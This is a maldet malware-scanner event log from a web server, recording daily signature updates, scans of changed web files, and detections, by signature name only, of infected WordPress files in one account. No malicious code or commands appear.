Feb 07 2026 03:37:16 web1 maldet(366439): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 07 2026 03:37:16 web1 maldet(366439): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 07 2026 03:37:17 web1 maldet(366439): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 07 2026 03:37:17 web1 maldet(366439): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 07 2026 03:37:17 web1 maldet(366439): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 07 2026 03:37:17 web1 maldet(366439): {sigup} verified md5sum of maldet-clean.tgz
Feb 07 2026 03:37:17 web1 maldet(366439): {sigup} unpacked and installed maldet-clean.tgz
Feb 07 2026 03:37:17 web1 maldet(366439): {sigup} signature set update completed
Feb 07 2026 03:37:17 web1 maldet(366439): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 07 2026 03:37:17 web1 maldet(366645): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 07 2026 03:37:17 web1 maldet(366645): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 07 2026 03:37:17 web1 maldet(366645): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 07 2026 03:37:17 web1 maldet(366645): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 07 2026 03:37:17 web1 maldet(366645): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 07 2026 03:37:54 web1 maldet(366645): {scan} file list completed in 37s, found 38098 files...
Feb 07 2026 03:37:54 web1 maldet(366645): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 07 2026 03:37:54 web1 maldet(366645): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (38098 files) in progress...
Feb 07 2026 03:43:48 web1 maldet(366645): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-includes/block-supports/widgets/index.php
Feb 07 2026 03:43:48 web1 maldet(366645): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-includes/ID3/abilities-api/index.php
Feb 07 2026 03:43:48 web1 maldet(366645): {hit} malware hit {HEX}php.exe.globals.416 found for /home/sps/public_html/bad/wp-includes/mchwtg.php
Feb 07 2026 03:43:48 web1 maldet(366645): {hit} malware hit {HEX}php.exe.globals.416 found for /home/sps/public_html/bad/wp-includes/wkwydt.php
Feb 07 2026 03:43:48 web1 maldet(366645): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-content/upgrade/theme-compat/index.php
Feb 07 2026 03:43:48 web1 maldet(366645): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-content/ngg/modules/photocrati-nextgen_basic_gallery/templates/acme-challenge/index.php
Feb 07 2026 03:43:48 web1 maldet(366645): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-admin/includes/colors/index.php
Feb 07 2026 03:43:48 web1 maldet(366645): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 38098, malware hits 7, cleaned hits 0, time 391s
Feb 07 2026 03:43:48 web1 maldet(366645): {scan} scan report saved, to view run: maldet --report 260207-0337.366645
Feb 07 2026 03:43:48 web1 maldet(366645): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260207-0337.366645
Feb 07 2026 08:31:27 web1 maldet(1341): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 08 2026 03:45:10 web1 maldet(2371638): {update} checking for available updates...
Feb 08 2026 03:45:11 web1 maldet(2371638): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 08 2026 03:45:11 web1 maldet(2371638): {update} hashing install files and checking against server...
Feb 08 2026 03:45:11 web1 maldet(2371638): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 08 2026 03:45:11 web1 maldet(2371638): {update} latest version already installed.
Feb 08 2026 03:45:11 web1 maldet(2371760): {sigup} performing signature update check...
Feb 08 2026 03:45:11 web1 maldet(2371760): {sigup} local signature set is version 202602074095392
Feb 08 2026 03:45:11 web1 maldet(2371760): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 08 2026 03:45:11 web1 maldet(2371760): {sigup} latest signature set already installed
Feb 08 2026 03:45:11 web1 maldet(2371853): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 08 2026 03:45:11 web1 maldet(2371853): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 08 2026 03:45:11 web1 maldet(2371853): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 08 2026 03:45:11 web1 maldet(2371853): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 08 2026 03:45:11 web1 maldet(2371853): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 08 2026 03:45:47 web1 maldet(2371853): {scan} file list completed in 36s, found 6052 files...
Feb 08 2026 03:45:47 web1 maldet(2371853): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 08 2026 03:45:47 web1 maldet(2371853): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (6052 files) in progress...
Feb 08 2026 03:47:12 web1 maldet(2371853): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-includes/ID3/abilities-api/index.php
Feb 08 2026 03:47:12 web1 maldet(2371853): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-content/upgrade/theme-compat/index.php
Feb 08 2026 03:47:12 web1 maldet(2371853): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 6052, malware hits 2, cleaned hits 0, time 121s
Feb 08 2026 03:47:12 web1 maldet(2371853): {scan} scan report saved, to view run: maldet --report 260208-0345.2371853
Feb 08 2026 03:47:12 web1 maldet(2371853): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260208-0345.2371853
Feb 08 2026 07:26:41 web1 maldet(1397): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 09 2026 03:54:53 web1 maldet(484936): {update} checking for available updates...
Feb 09 2026 03:54:53 web1 maldet(484936): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 09 2026 03:54:53 web1 maldet(484936): {update} hashing install files and checking against server...
Feb 09 2026 03:54:53 web1 maldet(484936): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 09 2026 03:54:53 web1 maldet(484936): {update} latest version already installed.
Feb 09 2026 03:54:53 web1 maldet(485062): {sigup} performing signature update check...
Feb 09 2026 03:54:53 web1 maldet(485062): {sigup} local signature set is version 202602074095392
Feb 09 2026 03:54:53 web1 maldet(485062): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 09 2026 03:54:53 web1 maldet(485062): {sigup} latest signature set already installed
Feb 09 2026 03:54:53 web1 maldet(485162): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 09 2026 03:54:53 web1 maldet(485162): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 09 2026 03:54:54 web1 maldet(485162): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 09 2026 03:54:54 web1 maldet(485162): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 09 2026 03:54:54 web1 maldet(485162): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 09 2026 03:55:29 web1 maldet(485162): {scan} file list completed in 35s, found 3195 files...
Feb 09 2026 03:55:29 web1 maldet(485162): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 09 2026 03:55:29 web1 maldet(485162): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (3195 files) in progress...
Feb 09 2026 03:56:03 web1 maldet(485162): {hit} malware hit {HEX}php.nested.base64.652 found for /home/sps/public_html/wp-content/ngg/modules/photocrati-nextgen_basic_gallery/templates/acme-challenge/index.php
Feb 09 2026 03:56:03 web1 maldet(485162): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 3195, malware hits 1, cleaned hits 0, time 70s
Feb 09 2026 03:56:03 web1 maldet(485162): {scan} scan report saved, to view run: maldet --report 260209-0354.485162
Feb 09 2026 03:56:03 web1 maldet(485162): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260209-0354.485162
Feb 09 2026 15:58:25 web1 maldet(1190): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 10 2026 02:08:32 web1 maldet(1163): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 10 2026 02:55:45 web1 maldet(1219): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 10 2026 03:36:50 web1 maldet(15425): {update} checking for available updates...
Feb 10 2026 03:36:50 web1 maldet(15425): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 10 2026 03:36:50 web1 maldet(15425): {update} hashing install files and checking against server...
Feb 10 2026 03:36:50 web1 maldet(15425): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 10 2026 03:36:50 web1 maldet(15425): {update} latest version already installed.
Feb 10 2026 03:36:50 web1 maldet(15534): {sigup} performing signature update check...
Feb 10 2026 03:36:50 web1 maldet(15534): {sigup} local signature set is version 202602074095392
Feb 10 2026 03:36:50 web1 maldet(15534): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 10 2026 03:36:50 web1 maldet(15534): {sigup} new signature set 20260210873235 available
Feb 10 2026 03:36:50 web1 maldet(15534): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 10 2026 03:36:50 web1 maldet(15534): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 10 2026 03:36:50 web1 maldet(15534): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Feb 10 2026 03:36:51 web1 maldet(15534): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 10 2026 03:36:51 web1 maldet(15534): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 10 2026 03:36:51 web1 maldet(15534): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 10 2026 03:36:51 web1 maldet(15534): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 10 2026 03:36:51 web1 maldet(15534): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 10 2026 03:36:51 web1 maldet(15534): {sigup} verified md5sum of maldet-clean.tgz
Feb 10 2026 03:36:51 web1 maldet(15534): {sigup} unpacked and installed maldet-clean.tgz
Feb 10 2026 03:36:51 web1 maldet(15534): {sigup} signature set update completed
Feb 10 2026 03:36:51 web1 maldet(15534): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 10 2026 03:36:51 web1 maldet(15741): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 10 2026 03:36:51 web1 maldet(15741): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 10 2026 03:36:51 web1 maldet(15741): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 10 2026 03:36:51 web1 maldet(15741): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 10 2026 03:36:51 web1 maldet(15741): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 10 2026 03:37:30 web1 maldet(15741): {scan} file list completed in 39s, found 11099 files...
Feb 10 2026 03:37:30 web1 maldet(15741): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 10 2026 03:37:30 web1 maldet(15741): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (11099 files) in progress...
Feb 10 2026 03:39:36 web1 maldet(15741): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 11099, malware hits 0, cleaned hits 0, time 165s
Feb 10 2026 03:39:36 web1 maldet(15741): {scan} scan report saved, to view run: maldet --report 260210-0336.15741
Feb 10 2026 04:11:37 web1 maldet(1218): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 10 2026 23:30:16 web1 maldet(1192): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 11 2026 00:52:01 web1 maldet(1208): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 11 2026 04:24:53 web1 maldet(60405): {update} checking for available updates...
Feb 11 2026 04:24:53 web1 maldet(60405): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 11 2026 04:24:53 web1 maldet(60405): {update} hashing install files and checking against server...
Feb 11 2026 04:24:53 web1 maldet(60405): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 11 2026 04:24:53 web1 maldet(60405): {update} latest version already installed.
Feb 11 2026 04:24:53 web1 maldet(60516): {sigup} performing signature update check...
Feb 11 2026 04:24:53 web1 maldet(60516): {sigup} local signature set is version 20260210873235
Feb 11 2026 04:24:53 web1 maldet(60516): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 11 2026 04:24:53 web1 maldet(60516): {sigup} latest signature set already installed
Feb 11 2026 04:24:53 web1 maldet(60604): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 11 2026 04:24:54 web1 maldet(60604): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 11 2026 04:24:54 web1 maldet(60604): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 11 2026 04:24:54 web1 maldet(60604): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 11 2026 04:24:54 web1 maldet(60604): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 11 2026 04:25:22 web1 maldet(60604): {scan} file list completed in 28s, found 16836 files...
Feb 11 2026 04:25:22 web1 maldet(60604): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 11 2026 04:25:22 web1 maldet(60604): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (16836 files) in progress...
Feb 11 2026 04:28:47 web1 maldet(60604): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 16836, malware hits 0, cleaned hits 0, time 234s
Feb 11 2026 04:28:47 web1 maldet(60604): {scan} scan report saved, to view run: maldet --report 260211-0424.60604
Feb 11 2026 06:31:05 web1 maldet(1166): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 11 2026 23:50:41 web1 maldet(1158): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 12 2026 04:19:13 web1 maldet(84568): {update} checking for available updates...
Feb 12 2026 04:19:13 web1 maldet(84568): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 12 2026 04:19:13 web1 maldet(84568): {update} hashing install files and checking against server...
Feb 12 2026 04:19:13 web1 maldet(84568): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 12 2026 04:19:13 web1 maldet(84568): {update} latest version already installed.
Feb 12 2026 04:19:13 web1 maldet(84680): {sigup} performing signature update check...
Feb 12 2026 04:19:13 web1 maldet(84680): {sigup} local signature set is version 20260210873235
Feb 12 2026 04:19:14 web1 maldet(84680): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 12 2026 04:19:14 web1 maldet(84680): {sigup} latest signature set already installed
Feb 12 2026 04:19:14 web1 maldet(84768): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 12 2026 04:19:14 web1 maldet(84768): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 12 2026 04:19:14 web1 maldet(84768): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 12 2026 04:19:14 web1 maldet(84768): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 12 2026 04:19:14 web1 maldet(84768): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 12 2026 04:19:51 web1 maldet(84768): {scan} file list completed in 37s, found 28268 files...
Feb 12 2026 04:19:51 web1 maldet(84768): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 12 2026 04:19:51 web1 maldet(84768): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (28268 files) in progress...
Feb 12 2026 04:23:36 web1 maldet(84768): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 28268, malware hits 0, cleaned hits 0, time 262s
Feb 12 2026 04:23:36 web1 maldet(84768): {scan} scan report saved, to view run: maldet --report 260212-0419.84768
Feb 12 2026 18:47:23 web1 maldet(1221): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 13 2026 03:05:46 web1 maldet(1175): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 13 2026 04:51:36 web1 maldet(37060): {update} checking for available updates...
Feb 13 2026 04:51:36 web1 maldet(37060): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 13 2026 04:51:36 web1 maldet(37060): {update} hashing install files and checking against server...
Feb 13 2026 04:51:36 web1 maldet(37060): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 13 2026 04:51:36 web1 maldet(37060): {update} latest version already installed.
Feb 13 2026 04:51:36 web1 maldet(37170): {sigup} performing signature update check...
Feb 13 2026 04:51:36 web1 maldet(37170): {sigup} local signature set is version 20260210873235
Feb 13 2026 04:51:36 web1 maldet(37170): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 13 2026 04:51:36 web1 maldet(37170): {sigup} new signature set 202602131845305 available
Feb 13 2026 04:51:36 web1 maldet(37170): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 13 2026 04:51:36 web1 maldet(37170): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Feb 13 2026 04:51:37 web1 maldet(37170): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Feb 13 2026 04:51:37 web1 maldet(37170): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 13 2026 04:51:37 web1 maldet(37170): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Feb 13 2026 04:51:37 web1 maldet(37170): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Feb 13 2026 04:51:37 web1 maldet(37170): {sigup} verified md5sum of maldet-sigpack.tgz
Feb 13 2026 04:51:37 web1 maldet(37170): {sigup} unpacked and installed maldet-sigpack.tgz
Feb 13 2026 04:51:37 web1 maldet(37170): {sigup} verified md5sum of maldet-clean.tgz
Feb 13 2026 04:51:37 web1 maldet(37170): {sigup} unpacked and installed maldet-clean.tgz
Feb 13 2026 04:51:37 web1 maldet(37170): {sigup} signature set update completed
Feb 13 2026 04:51:37 web1 maldet(37170): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 13 2026 04:51:37 web1 maldet(37374): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 13 2026 04:51:37 web1 maldet(37374): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 13 2026 04:51:37 web1 maldet(37374): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 13 2026 04:51:37 web1 maldet(37374): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 13 2026 04:51:37 web1 maldet(37374): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 13 2026 04:52:16 web1 maldet(37374): {scan} file list completed in 39s, found 11333 files...
Feb 13 2026 04:52:16 web1 maldet(37374): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 13 2026 04:52:16 web1 maldet(37374): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (11333 files) in progress...
Feb 13 2026 04:54:28 web1 maldet(37374): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 11333, malware hits 0, cleaned hits 0, time 171s
Feb 13 2026 04:54:28 web1 maldet(37374): {scan} scan report saved, to view run: maldet --report 260213-0451.37374
Feb 13 2026 20:43:12 web1 maldet(1175): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 14 2026 04:30:29 web1 maldet(152730): {update} checking for available updates...
Feb 14 2026 04:30:29 web1 maldet(152730): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 14 2026 04:30:29 web1 maldet(152730): {update} hashing install files and checking against server...
Feb 14 2026 04:30:30 web1 maldet(152730): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 14 2026 04:30:30 web1 maldet(152730): {update} latest version already installed.
Feb 14 2026 04:30:30 web1 maldet(152840): {sigup} performing signature update check...
Feb 14 2026 04:30:30 web1 maldet(152840): {sigup} local signature set is version 202602131845305
Feb 14 2026 04:30:30 web1 maldet(152840): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 14 2026 04:30:30 web1 maldet(152840): {sigup} latest signature set already installed
Feb 14 2026 04:30:30 web1 maldet(152928): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 14 2026 04:30:30 web1 maldet(152928): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 14 2026 04:30:30 web1 maldet(152928): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 14 2026 04:30:30 web1 maldet(152928): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 14 2026 04:30:30 web1 maldet(152928): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 14 2026 04:31:02 web1 maldet(152928): {scan} file list completed in 32s, found 9240 files...
Feb 14 2026 04:31:02 web1 maldet(152928): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Feb 14 2026 04:31:02 web1 maldet(152928): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (9240 files) in progress...
Feb 14 2026 04:33:02 web1 maldet(152928): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 9240, malware hits 0, cleaned hits 0, time 152s
Feb 14 2026 04:33:02 web1 maldet(152928): {scan} scan report saved, to view run: maldet --report 260214-0430.152928
Feb 14 2026 08:48:15 web1 maldet(1167): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Feb 15 2026 04:24:41 web1 maldet(935831): {update} checking for available updates...
Feb 15 2026 04:24:41 web1 maldet(935831): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Feb 15 2026 04:24:41 web1 maldet(935831): {update} hashing install files and checking against server...
Feb 15 2026 04:24:41 web1 maldet(935831): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Feb 15 2026 04:24:41 web1 maldet(935831): {update} latest version already installed.
Feb 15 2026 04:24:41 web1 maldet(935940): {sigup} performing signature update check...
Feb 15 2026 04:24:41 web1 maldet(935940): {sigup} local signature set is version 202602131845305
Feb 15 2026 04:24:41 web1 maldet(935940): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Feb 15 2026 04:24:41 web1 maldet(935940): {sigup} latest signature set already installed
Feb 15 2026 04:24:42 web1 maldet(936028): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Feb 15 2026 04:24:42 web1 maldet(936028): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Feb 15 2026 04:24:42 web1 maldet(936028): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Feb 15 2026 04:24:42 web1 maldet(936028): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Feb 15 2026 04:24:42 web1 maldet(936028): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Feb 15 2026 04:25:15 web1 maldet(936028): {scan} file list completed in 33s, found 1073 files...
Feb 15 2026 04:25:15 web1 maldet(936028): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
